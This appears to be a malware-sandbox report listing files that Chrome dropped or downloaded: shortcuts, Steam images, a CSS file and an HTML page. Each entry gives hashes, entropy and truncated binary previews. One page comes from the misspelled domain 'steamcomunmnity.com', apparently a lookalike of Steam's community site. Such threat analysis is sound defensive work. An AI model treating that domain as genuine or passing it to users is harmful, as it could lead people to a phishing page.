        Size (bytes):2681
        Entropy (8bit):3.9920943768428327
        Encrypted:false
        SSDEEP:48:8ykdHTfvwH5idAKZdA1vehDiZUkwqehNlxy+R:8yQz/Vxy
        MD5:D512FEF60F757352800779627422D3C8
        SHA1:953112DD8DB63BA1314C37444125E62B10D8B6C7
        SHA-256:C617754571CA51AED008B8FD87211932F7F5A670E736855540E1C5046B6EE4DE
        SHA-512:7A282156C8F74F93AF17A11FC484C02351BCFBD5B2700EF6631CB6C5B6A3C0C566B7BA6CB8461CB29BB8B223577BA3B2F03962A6EA8BFFA4B9BFC13EEE165DFC
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,....M.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XO............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:58:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2681
        Entropy (8bit):3.980945862881516
        Encrypted:false
        SSDEEP:48:8mkdHTfvwH5idAKZdA1hehBiZUk1W1qehblxy+C:8mQz/9hxy
        MD5:7856B30B66C92C9809E5C8377B85B04C
        SHA1:0E908B19D2295742557546AFF8118ABB3714021F
        SHA-256:5F8A03C3897BD72C3C641225B613984F9DD5361F4A8D91FE27BC31925D7A0238
        SHA-512:C42F10D4CDA81215B5E2D29852F17F39F573FF55A28077CF7DBA3AE0BBFBCE27BE6DBF5B11423801CF420818A22E1DE5AA6E4459769C50450D9182CD755FDE77
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,......J.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XO............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 25 21:58:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2683
        Entropy (8bit):3.9912854903161756
        Encrypted:false
        SSDEEP:48:8/kdHTfvwH5idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbFlxy+yT+:8/Qz3T/TbxWOvTbfxy7T
        MD5:2F9F03B4FDFFA56D5136AE2445CCF01A
        SHA1:0062F1E469CE1357ACD3A9B1202D4CDF4CDD3765
        SHA-256:3D3FB9E474A48D65DC390DE28B8FCD68DD73F383BCC70B82B447A01182DE8A69
        SHA-512:3F4820E88A000E0BF6E9C2260BD5B4CBEB0E05EA2B5F42B140680CE9725AD75DC41B2149BA94004E529C5507F6C63C5A65D51F141039C622223CBC7AE5463B57
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,.....1......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XO............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 501 x 201, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):173945
        Entropy (8bit):7.993579285920834
        Encrypted:true
        SSDEEP:3072:LILVJszNCDvFSDZqmjJ2Cj01ft+mdIpd+52IDQOL:kgQDs4msCAFt+mdE+/QC
        MD5:1470A096AA38768AA1781ECF23887EFF
        SHA1:2C26EA931550E6DF35C6273B4F6C618B42B0A927
        SHA-256:6A0B7B41143DB496D89FB712DACCAE0395965BCD1687531A3402C0F9D721014E
        SHA-512:C7413471550EF285E585C9DBFE47B43247EC9EE41F5B3E96F9F6F36502E383F649F33756EE83844B7D9A9EF17F681A2FDA0FF5162369A286C15C2109A3D71925
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.............:..s....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899, 2023/06/25-20:01:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 23.0 (Windows)" xmp:CreateDate="2023-11-14T10:08:43-08:00" xmp:ModifyDate="2024-02-09T14:19:44-08:00" xmp:MetadataDate="2024-02-09T14:19:44-08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:6c7043dc-
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x103, components 3
        Category:dropped
        Size (bytes):7188
        Entropy (8bit):7.928137211818788
        Encrypted:false
        SSDEEP:96:2NDAhc38+whap12KImaeDzUshh6g2a01DEb2+EtlXlqMtz0JM1jSjSh4JrNRGB1u:2iO8+wc3h3HDzUsztSMMtlALS4JWmlGK
        MD5:F957DF6EDCDA7BA4BAB69BB411034539
        SHA1:6D78BFDD85C379441A047E64B3AADC6D79E52064
        SHA-256:7D7877327F8EE705E15AC9DDC24CE00D62DF0CA1AD268908D654D30BF505F17A
        SHA-512:DF485EDAFC0C577237F8B1CD0AA6F72732D9E703390F2244E0C143675DD02A5405F1A1D31DAD61AB17379F3A1106FE22A828DB7B0FA73E67DB68E1CA57A3DA78
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................g..............................................I..........................!..1A"Qa..q#25....$s.......%BSr....3Rc4Cb...................................1.......................!1.A.Qa.."2...bq#...3..............?...m.[..B...e....c.B.G.........Q..o..g.........,......V..d...8.J?.&.i.1.......\V3.!,qd.f.........Y.#..&..A.....y./.r....~..Jn........'....L~........-.o...'..?.............}>..........9...~Z......=.Xw.>.^S. .6.Q..'.......=..JSn.jA?....9......-....+......w.q.,.~_..T0Ay.r.C..t...\r9I...Q...u|..y......H.uQ...&x.....vQ..q..K....C...t.....S..7..... ....d.OD....C....Pl.^...Q.P..\...R"?N}.Yu..Z...B.v.<..0.=......t#0.G...ld%...P.{c]..E.y...IO.B.....p5.:......=.P^....lq_..bI>.}1.a..&.(....O...1h.....r.Y6.H.\.Y2L../H.....h.nu...S'..T=p....U.....*....&.2..*M.".D../lw.[/.z.......:.>)..M.q#..H.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 59x59, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):26393
        Entropy (8bit):7.968677531645298
        Encrypted:false
        SSDEEP:384:0U7qvom3zuxQWjV5gnKj8okS5IO8NpqozIm+CRU3GS9nKAYrq0S3rGgP:0U7OE2nK8QIDvDIm1snnzv0SKgP
        MD5:590397FCE997897436C8F83754B5EAEE
        SHA1:D428EC72F0C502DE6D2A96A79B586EFBCF947B92
        SHA-256:212F36D01CBF9506F481718EDF1A3BD4337A4942021013D5F217F043425872B5
        SHA-512:F77E8AFB50D89FE207357EE9CE87FC2CD6E90E6FC411B2AFD3DDCBF3BA38B2805A972702884D79B60A6EDDB80E3ABDEE98E7D02F97F76DE3C84CF97F0A71CE88
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2524890/header_292x136.jpg?t=1716365033
        Preview:......JFIF.....;.;.....C....................................................................C.........................................................................$............................................U............................!1.A."2Qaq......#BV....3Rbu....$&6r...4CFdt...%c.........................................L.........................!1.AQ..aq".....2BT......5Rr...#Db$%S....34..Cc...............?...b.]..P...j{.;i.O.T.%.D.lt..1^.....X..)(.s-q..5.~<.E..7.d?....._...^O.s.^..oid:.....8...&........\+.I...8..M.`...J.}.*t..z.4.q..1<\|BI.....^...$.T#....a7.^Ks.Cw..{kd.D..C..nx...E88'.H.i{lA... ........^.@.V..?.......6...aS...'..~....h.@.....3....'..~....h.@................./.)..!...........q..G..M....hg..e.N..'..j..Y.....'l&.+....8*.J..T.~d..Z.r...'.g.V.%.].*..I=.$AS.H..A.g....19^...$...!FP.v8+....1S.P.(....S....@.._.i...?.S.f...J|).....y?m.g..?.S.f.....C._...^O.s.Y.............W.?....V~<;C..7.l?..>.?U.O....>.....~.M....hO......y
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 92 x 26, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1846
        Entropy (8bit):7.365755828390777
        Encrypted:false
        SSDEEP:24:o/51he91Wwh82lYSg767V+6gT3qxyJbRW6vRW6nGPAQ4PKsSnflj0Sybz4+43Ore:o/qQvnb6706gVJbVvVnX/8NAzb/4OFjg
        MD5:574C350C7B23AE794D5276F8580E0838
        SHA1:235C7B35C3468F8915ECA01F7ABDB43D34079609
        SHA-256:8B97BA0DAC22FE6704C1F6D95FE79613F33017804F256ABB9006DF0442491787
        SHA-512:F1F2D7B6FA49E9241F2B88560127EB2871F66123C2F9DE45B257750CF13E6EBB32A9D85D87AADA6A99838A2F3C5412540065CBAB398760A50F15AAE3A759F9F7
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...\.........:.;)....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:CA2980EA1CE911E48001B5E88DFE2FC8" xmpMM:InstanceID="xmp.iid:CA2980E91CE911E48001B5E88DFE2FC8" xmp:CreatorTool="Adobe Photoshop CS6 Windows"> <xmpMM:DerivedFrom stRef:instanceID="022AC118D7972AA30ADDF82E49682075" stRef:documentID="022AC118D7972AA30ADDF82E49682075"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..X[H.Q...7.-.a.E.0.(."....-..z.GIA.O.}..Q.._EQP..(.0{.(z@.......Y.......v..;g.3.Y...93.Y..>{.......02..~b.X....g2..h.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):10191
        Entropy (8bit):7.9325106354111075
        Encrypted:false
        SSDEEP:192:FT6SR0SmWoEvx5WXWXJwm3tvgCVhvHKmD84z92f4G5gorZ29TzAdM86dBHRt:56SR/mx4ug9r3Q4J2f4GP2TzAgrt
        MD5:55A23BABD5C6F1F65F76B325F689BBC3
        SHA1:5ED451E60A284B8749C605C57F2AF155B80AF752
        SHA-256:B1F91FCBF766E7D9AB172DDFA1BA541A4D67ECEC810F5DE00F8AD9B9B8BFEC0A
        SHA-512:AE0BA7F9E4D0F5668D17668787D837FCFAC3A59721D03CB0943DBB5828C5D8B1B1283AF70D7416C829F1AA743B027A0DB3EB57094E05404F2BB8B15AE8C53539
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/553850/capsule_184x69.jpg?t=1715880416
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................;..........................!.1.."AQ.a.2q.#BR..r..3.....b...................................8.......................!..1AQ."aq....2.....#B...R$b...............?......o*.....~..j.9......Me.d..N..m....c5.B.H..+uL.C...:=I'.~5....gx.zP..6..?s..Ix.....W#..2B3...!....T0k..S........~t{N..i"....).N..%e...x..h...,.x.ib.T.....Mt..5...!!.%!)Kc.Oo..L....U...B.h..$..;...e....Rw.g..Y..3.ZU.......S9.b.,..]z...G....>. .q.~.C6....P.Z.k.B. ...O.N.`.....U....%R"8@.%....?....kjdW.-..-%.....I......k.2.^....Om1.J6..u.k...L...J.C..#..}..rIZ0A<...m.n.q._......b)...R.......%......p .{{..a....>..#uF.M......;....0.....d...:S..-..o..0...[B.!!A..~.Tw..[f....T.L....@i......k....!.>.%.HT&..K....w6@!#....4=.M.E.}.......}'...1.<.f.....R/T;..BP..0.w...Y.........j.j\5..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, interlaced
        Category:dropped
        Size (bytes):1871
        Entropy (8bit):7.348722999646685
        Encrypted:false
        SSDEEP:48:U6wqQNn2x7gtJ3f6gaOO9EI6rjiFYXkNsa:/Y2g6ZOI6fiyUNX
        MD5:27527A60085AF69D263E4FB0019BD33F
        SHA1:22F79CA55A679E13A09E74500AD30C72B66F749C
        SHA-256:7E395F84BB0649858430AC4DCFBD79BF73BB7660D69B9D4FA2501C08F0690CC8
        SHA-512:87A0074CB0A5B109C43556C34486C2A23F40E8726C2A2313757C7EF64473404A7F45E0FDCC5A4F7C8AF0BFE41632BF681AEFC89FC446A8108BCD8C374CA25E62
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...4... .....*8k.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:18006B77135211E88773ABA8DAB20EEC" xmpMM:DocumentID="xmp.did:18006B78135211E88773ABA8DAB20EEC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:18006B75135211E88773ABA8DAB20EEC" stRef:documentID="xmp.did:18006B76135211E88773ABA8DAB20EEC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>v.......IDATx.b...?.......O.E.....O...A.@.1...K.J..b_..@.@..J.1L...)oA.@.1....@..._..l.j.5.Gb3...Aw.6p.....J.....@....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2921)
        Category:downloaded
        Size (bytes):4921
        Entropy (8bit):5.89695716858962
        Encrypted:false
        SSDEEP:96:WBDGyeNDSfd3ZPK9sL7RRa3OGSaz/tS1CQ+J4bSv31J7Wq:WBeNSflZPK9aRRaeGSazo1X+KbSvlJiq
        MD5:E56B45D3018852C97503C1021369F5C8
        SHA1:E9D07303C6D54F3F093D7372CF12044A0C5DBC3F
        SHA-256:12C65403410E5259E728FDFBA3537DCAEDDDD771419BE59EEEEBE0460E26C8F2
        SHA-512:10A6D3D93303898F34947236ADBBEE7C77B2A77115FD3410AD235D2BB73BBB1DF35741D31E9F27F2C44279D8310763D63BDD38BDD6572C66938154C5AEE3843B
        Malicious:false
        Reputation:low
        URL:https://steamcomunmnity.com/app/1644413/STALKER_2_Heart_of_Chornobyl
        Preview:<!DOCTYPE html>.<html>..<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <meta name="generator">.<meta name="rating" content="General">.<meta name="copyright">.<meta name="author" content="Author">.<meta name="revisit-after" content="30 days">.<meta name="distribution" content="global">.<title>........ ......... .. S.T.A.L.K.E.R. 2: Heart of Chornobyl ..... Steam</title><meta property="og:title" content="........ ......... .. S.T.A.L.K.E.R. 2: Heart of Chornobyl ..... Steam"><link rel="shortcut icon" href="https://steamcommunity.com/favicon.ico" type="image/x-icon"><meta property="og:description" content=".......... ............. .... .......... ...... ....... ......, ........... ........ . ...... ........... ........ ........... ......... ......., ..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):48950
        Entropy (8bit):7.965922433799161
        Encrypted:false
        SSDEEP:768:9kB2EUOh8JP72sjmk2ho+6B8xP1zWzNRsRFeoThFT/W7yZ+kxEteRm0wsGS+UEg:90+PkV6wtzyNMFe+FTcCEcm7g
        MD5:68AFDACD8DE6F6ACDB1335163D3DAAD1
        SHA1:0F7B2FEE87BB2DFD43781BF69965F91822BDDC04
        SHA-256:D1366B60D10B1C4165A142AA1A30FB49F5CC7A4B89EC5D1872BF82FFB214E533
        SHA-512:E67B127AEA2A21C21902E564F1604C42D16F1148656D9A27774366451D92ACAE462E973E8AA6283941C01856DDD7220D56F34290A580B944E8BB2CB26AA0C2D1
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................J.........................!1A..Qa."q..2..#B.......$34Rbr5S.....Cst%Dc...................................8......................!.1..AQ"a.2q.......B...3.#R.$b..............?..........B..E.BPPP.@..4...).P.@....P.(((......(......(........(......(..h...P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@..I=.2.%m.@....kGa.X.P."{.../...{c...$.:8..<.WG..[h..b.0...@....!....aH...Fi....(......()....P.@....P.@..........P.@....P.@...%...P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@......%.^f.S8.).....q..@.a.@.V...;s.g$o..1.jm.<...<.........1@.#.........J.J...(......(((......(......(........(......(......@....P.@....P.@....P.@....P.@....P.@....P.@....-.A*4...y..jD........i.Y.....-.u....>....L.g.F*....r[{.h...............X./i........!@..`.:..J.z....?/l.`....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):5449
        Entropy (8bit):7.916921346487798
        Encrypted:false
        SSDEEP:96:vhb0wo1FggHl/+LQJ0JR94jzBYmFceZvSfe3OBAn/S9bkJAgh+nc:iHUQzBYmFczfUO9bkhonc
        MD5:1B7C8FC062B8D2837E87B10F4AB8CED8
        SHA1:2FC99FB0B94B0B08B2A3D06F2671244D6CAA5483
        SHA-256:E4308B99AFAB79BA96216118F0B2060CBB1D5FE1EBE00EC368E098B6C6A9AF53
        SHA-512:74F0EFDB47A8F8130AF278EE5FEA3C842EF197E0244B41315D49A16143A0436AF4425AF8F8B2ED2997351EAB68F545B5FBA9FCADA1034B0ECB8428A48AA2236A
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................=..........................!.."1AQa...#25qrs....346BRb...Ct................................/......................!..1AQ."2aq..3.......#.............?...!.y.?.qQ.O<....^.8..:..|.`.U.{x^..+ro..^5....s...S..%..q..H4..5.x..H..n.{+H.Q7....W.~.bf.o..S...yR..\..B.b.P..Jm...U.....a..5P..q.${6C."ng..p...3C)nD..S..Q...`G.J...'.. }.F.....X..{Ggn..._..S.5....6..s.....&...A....P.....8U..3.xk2.s$F..,.@...5..4........./.M.....26V.-D..".J.ZMI%UX...Y-GXJ.-.5on...X.".N.&..y......<.I..../J..._..u.A|y..b...4.q...H.z...|.UL....d.....J:/...+'P.44?..M.xU6vd.'{)q_.S.f...<Yj.*.....=..\_.....I.../.cN...<....r.t.\.+7T@.L....u(}e....~..}..e........F[.fE...=2,...al...\.AdXXmo#.uX..V=W.oK..1/...><.8.4.j..U(R...._*#ohKo.S...&...q..y.Y_......O..<......ff...%U,. .._1...Th..)&...R.w.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1280
        Entropy (8bit):6.717734822303927
        Encrypted:false
        SSDEEP:24:Iy1he91Wwjx82lY2T3ouVjF4/FayJ3V71FBZFfGe0pga/IA6PbNU2iRb9S:IwqQNn2xXshJ3BTZfCga16JH49S
        MD5:915ACBF45A60ECFFABC2730C35384818
        SHA1:DB2F755F7132BE456649A782C4E5BDCC88868C28
        SHA-256:7EC991D9353805F71AE4293FB299D00E579D2C59BD74E641B587D24B841A5DA6
        SHA-512:234777259FB16A8DDFAAAB3F4488633FB6001BCA918E8E58A34F89F8A267EA8FF5AC4DCF65E0BEEA9AB1C78AF42F6728A7C00CFB6BD8F038970BB030AC55F95D
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/ico/ico_cloud.png
        Preview:.PNG........IHDR...4... .....]?[f....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FE658773E2BB11E3ADB7D7D9895ED7D0" xmpMM:DocumentID="xmp.did:FE658774E2BB11E3ADB7D7D9895ED7D0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FE658771E2BB11E3ADB7D7D9895ED7D0" stRef:documentID="xmp.did:FE658772E2BB11E3ADB7D7D9895ED7D0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..H#...tIDATx.b...?.p..........'.'.....B..... ^.....G .........$.K...arb(....13.u.....k.6.T....... ...3Hb.8....C..b&.J
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):11395
        Entropy (8bit):5.263154477395774
        Encrypted:false
        SSDEEP:192:Zh6vqbjETmhTKN8xveEK6lIgpROZ793t37NAmr3LETECO+2Mlx1DWX73Mf+uEm4m:Zhcf33TCO+2gByhC
        MD5:C16C39B56D72EE779A4C29FB1BB60DD3
        SHA1:F0A8114D6E311F91357B3A9041DBCD96857B90EC
        SHA-256:5CD83EEE34169798040BBF6221263F6C5A5CBE5801C285813566EC1153DFCE09
        SHA-512:BB79CF68FA15EA0D4C883C4069AC22E121503F8031F8D17B9E6480D4CE8C701B81835789FA2E2D65841D2124EA88CD35CA982748B79FBB76C28C5A32BA21F8ED
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/css/v6/browse.css?v=wWw5tW1y7nea&l=english
        Preview:/* CSS Document */.....browse_header .page_title .blockbg {...background-color: #ff9900;...color: #000000;..}.....browse_floating_link {...float: right;...width: 288px;..}.....browse_links a {...color: #b0aeac;..}.....browse_links a.linkbar .rightblock {...color: #626366;..}.....tabbar {...white-space: nowrap;...margin-bottom: 10px;...overflow-x: auto;...overflow-y: hidden;..}..../* the preferred way is to wrap tabbar in tabbar_ctn, which helps handle horizontal scrolling on mobile */...tabbar_ctn {...margin-bottom: 10px;..}...tabbar_ctn .tabbar {...margin-bottom: 0;..}.....tabarea_filler {.. height: 40px;..}...tabarea .tab {.. display: inline-block;.. margin-right: 0px;.. border-top-left-radius: 3px;.. border-top-right-radius: 3px;.. margin-top: 3px;.. padding: 1px;..}...tabarea .tab .tab_browse_option_label,...tabarea .tab .tab_content {.. background: rgba( 0, 0, 0, 0.2 );.. border-top-left-radius: 3px;.. border-top-right-radius: 3px;.. font-size: 13p
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):3184
        Entropy (8bit):7.851378513683785
        Encrypted:false
        SSDEEP:96:vpMecErza5+2fX0AkCJv1tHfkX8LfGUz0Olp8Rj:BMejekStHcX8LsOcR
        MD5:55703EA03F58BCA601EED350A8EA23E2
        SHA1:5DD3C09D13023E6FD1CF403E9734510D5E070818
        SHA-256:510604171D38FAFBEE54C5FE06965AB89B11AF85DAF0DCFE0FBA6355B8A717C4
        SHA-512:D3D637B3C59F00C104CE1B5EA2B6E0A077C9A38416FFBE4A9378A5FE477210CA625213D876EC82A94D7565C44B81AE346DD732C684532B906BBABB07516F971B
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_41933624e8036bc3d1461028058a037132e1482d.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................=.........................!.1A.."Qa..2q.#3.....4Br.5b.Rs...................................-.....................!..1.AQa."q.....2B................?..d..`z.m.mi.jJ7.g*X....._.n~F0....pF......d...$...Y..za.D....H.......%.no[OP.....^DX9Gh.S0J..Z..old.....e.YCP..H....x.Z...<W.&dRuD%..&.>~x.:[.H."....@.G3|h._...aI......&]F9.......*......S.P/..9...X..}....................'......-......c.^.g.M....!...L.o.d.p1i....%O#o\Z`<....J..q@H).j...J....Qd..w.F....P..X...,M.&+.S",..z...yc....Q.RY.^..q..,.d./....#K.\.h....|>D..d.].K}.I....DW:...VZp).|)....s.;.D6n3.iX..$....Ag%Qp.u[.1.nv.Y&.z.*.@...."O.I.D.5F8.jgb...\b........8j....b.u,.u#.0A..C..&..j.h...R.b.....;.X...:**.......@....(..-.(.IX%..Pu..a......u'..kaS.G.f.B.c...@R.!}lq..B....4........d.....<..B.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
